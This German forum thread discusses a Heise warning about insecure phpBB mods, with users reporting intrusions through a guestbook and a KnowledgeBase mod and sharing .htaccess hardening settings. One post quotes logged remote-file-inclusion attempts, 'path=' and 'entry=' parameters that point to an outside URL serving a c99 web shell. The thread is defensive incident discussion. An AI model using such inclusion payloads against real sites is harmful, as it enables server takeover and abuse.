Ich weiß nicht, wo das besser untergebracht werden kann ...
Heise hat eine Mitteilung zu phpbb-Mods rausgebracht:
http://www.heise.de/newsticker/meldung/72626
phpBB-Module reißen Sicherheitslöcher auf
Hi,
Das besagte Guestbook habe ich schon vor ein paar Wochen von meiner Page runtergenommen, da es auffällig wurde wegen eventueller Eindringversuche. Einige der von Cracker Tracker abgefangenen URLs sahen sehr seltsam aus. Ich trau dem AGB seit dem nicht mehr über den Weg. Die Entwicklung des MOD wurde meines Wissens vor Jahren schon aufgegeben. Hier und da eine kleine Anpassung ans phpBB, mehr nicht. Macht nen sehr unsauberen Eindruck.
Mit dem TopList MOD hab ich keine Erfahrung.
Ob es nun eine News auf Heise.de wert ist, na ja ich weiss nicht und diesmal nur wegen zweier "FrickelMODs" von denen sicherlich noch hunderte existieren.
Welcher MOD ist schon richtig richtig dicht. Das durch die Erweiterungen Sicherheitslöcher entstehen können sollte ohnehin jedem bewußt sein. Viele MODs sind nur auf Funktionalität programmiert. Aus ner Beta wird schnell die Final gemacht, sobald die gröbsten Bugs raus sind. Sicherheit ist dann eine Sache, die viel Zeit kosten würde ohne dem MOD weitere Funktionalität und Effektivität zu geben.
mfg
plACEbo
Das besagte Guestbook habe ich schon vor ein paar Wochen von meiner Page runtergenommen, da es auffällig wurde wegen eventueller Eindringversuche. Einige der von Cracker Tracker abgefangenen URLs sahen sehr seltsam aus. Ich trau dem AGB seit dem nicht mehr über den Weg. Die Entwicklung des MOD wurde meines Wissens vor Jahren schon aufgegeben. Hier und da eine kleine Anpassung ans phpBB, mehr nicht. Macht nen sehr unsauberen Eindruck.
Mit dem TopList MOD hab ich keine Erfahrung.
Ob es nun eine News auf Heise.de wert ist, na ja ich weiss nicht und diesmal nur wegen zweier "FrickelMODs" von denen sicherlich noch hunderte existieren.
Welcher MOD ist schon richtig richtig dicht. Das durch die Erweiterungen Sicherheitslöcher entstehen können sollte ohnehin jedem bewußt sein. Viele MODs sind nur auf Funktionalität programmiert. Aus ner Beta wird schnell die Final gemacht, sobald die gröbsten Bugs raus sind. Sicherheit ist dann eine Sache, die viel Zeit kosten würde ohne dem MOD weitere Funktionalität und Effektivität zu geben.
mfg
plACEbo
Vorwärts immer, Rückwärts nimmer!
-
Rainer4ever
- Mitglied
- Beiträge: 352
- Registriert: 10.10.2003 22:51
- Wohnort: Ribnitz-Damgarten
- Kontaktdaten:
Ich kann jedem nur empfehlen diese Warnung unbedingt ernst zu nehmen.
Bei mir ist letzte Woche leider ein Wurm durch das Gästebuch in mein Forum gekommen.
War keine besonders angenehme Erfahrung...
Ich habe daraufhin ein Backup mit ausgebauten Gästebuch hochgeladen, die Passwörter geändert und all-inkl angeschrieben, ob sie die php Globals deaktivieren können.
Zu dem Wurm habe ich nur folgende Infos:
So sieht das Ding aus: http://www.traktorhof.com/1.jpg
Im Ctracker stand folgendes:
Wenn man auf den Link klickt, meckert auch sofort das Virenprogramm und meldet einen BDS/PHP.Agent.A
Wenn man den Link nun folgt, erscheint ein php Quellcode...
Wenn dieser benötigt wird, werde ich diesen hier gerne noch posten.
Ich weis zwar nicht, in wie weit diese Infos schon bekannt sind, aber vielleicht interessiert es doch den ein oder anderen.
Bei mir ist letzte Woche leider ein Wurm durch das Gästebuch in mein Forum gekommen.
War keine besonders angenehme Erfahrung...
Ich habe daraufhin ein Backup mit ausgebauten Gästebuch hochgeladen, die Passwörter geändert und all-inkl angeschrieben, ob sie die php Globals deaktivieren können.
Zu dem Wurm habe ich nur folgende Infos:
So sieht das Ding aus: http://www.traktorhof.com/1.jpg
Im Ctracker stand folgendes:
Code: Alles auswählen
path=http://www.bremsnes-kfum.org/c99txt?Code: Alles auswählen
entry=http://www.bremsnes-kfum.org/c99txt?Wenn man den Link nun folgt, erscheint ein php Quellcode...
Wenn dieser benötigt wird, werde ich diesen hier gerne noch posten.
Ich weis zwar nicht, in wie weit diese Infos schon bekannt sind, aber vielleicht interessiert es doch den ein oder anderen.
-
larsneo
- Mitglied
- Beiträge: 2622
- Registriert: 07.03.2002 15:23
- Wohnort: schwäbisch gmünd
- Kontaktdaten:
via .htaccessund all-inkl angeschrieben, ob sie die php Globals deaktivieren können.
Code: Alles auswählen
# set register_globals=off
php_flag register_globals offCode: Alles auswählen
# set magic quotes settings on
php_flag magic_quotes_gpc on-
Rainer4ever
- Mitglied
- Beiträge: 352
- Registriert: 10.10.2003 22:51
- Wohnort: Ribnitz-Damgarten
- Kontaktdaten:
Vielen Danklarsneo hat geschrieben:via .htaccessund all-inkl angeschrieben, ob sie die php Globals deaktivieren können.ebenfalls eine gute idee für einige chaos-mods:Code: Alles auswählen
# set register_globals=off php_flag register_globals offCode: Alles auswählen
# set magic quotes settings on php_flag magic_quotes_gpc on
-
dosensteck
- Mitglied
- Beiträge: 19
- Registriert: 22.06.2005 22:29
- Wohnort: Wien
- Kontaktdaten:
ja, bei mir auch. wurde massig spam versendetDJBase hat geschrieben:Bei mir sind sie über das KnowledgeBase MOD eingedrungen (kb_constants.php) und haben nette Sachen hinterlassen.
http://tecchannel.de/sicherheit/aktuell/438202/
-
IPB_Flüchtling
- Mitglied
- Beiträge: 1862
- Registriert: 23.12.2004 22:46
@larsneo:
Vielen Dank für Deine .htaccess-Ergänzungen! Wieder etwas gelernt.
Habe es gerade mit dem CrackerTracker Sicherheitscheck ausprobiert: Seit ich Deine Erweiterung der .htaccess vorgenommen habe, gilt bei mir "PHP Globals deaktiviert SICHER"!
Gibt es für den PHP Safe Mode eigentlich auch so eine .htaccess-Einstellung, um ihn zu aktivieren?
Danke noch einmal!
LG, IPB_Flüchtling
Vielen Dank für Deine .htaccess-Ergänzungen! Wieder etwas gelernt.
Habe es gerade mit dem CrackerTracker Sicherheitscheck ausprobiert: Seit ich Deine Erweiterung der .htaccess vorgenommen habe, gilt bei mir "PHP Globals deaktiviert SICHER"!
Gibt es für den PHP Safe Mode eigentlich auch so eine .htaccess-Einstellung, um ihn zu aktivieren?
Danke noch einmal!
LG, IPB_Flüchtling
-
larsneo
- Mitglied
- Beiträge: 2622
- Registriert: 07.03.2002 15:23
- Wohnort: schwäbisch gmünd
- Kontaktdaten:
nein - der safemode ist auch in bezug auf sicherheit eigentlich der falsche ansatzpunkt:Gibt es für den PHP Safe Mode eigentlich auch so eine .htaccess-Einstellung, um ihn zu aktivieren?
http://de.php.net/manual/de/features.safe-mode.php hat geschrieben:Safe Mode ist der Versuch, Sicherheitsprobleme bei gemeinsam genutzten Servern zu lösen. Bezogen auf die Systemarchitektur, ist es der falsche Ansatz, diese Probleme innerhalb der PHP Schicht lösen zu wollen.
-
IPB_Flüchtling
- Mitglied
- Beiträge: 1862
- Registriert: 23.12.2004 22:46
Danke Dir!
Zu
habe ich auf der von Dir bekannt gegebenen Seite auch einen interessanten Artikel gefunden (leider nur in englischer Sprache):
http://de.php.net/manual/en/security.globals.php
LG, IPB_Flüchtling
Zu
Code: Alles auswählen
# set register_globals=off
php_flag register_globals offhttp://de.php.net/manual/en/security.globals.php
LG, IPB_Flüchtling
